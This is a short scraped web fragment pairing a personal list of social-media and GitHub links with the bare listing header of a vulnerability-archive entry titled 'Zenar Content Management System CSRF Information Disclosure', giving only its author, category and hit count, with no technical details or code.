# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
Zenar Content Management System CSRF Information Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 314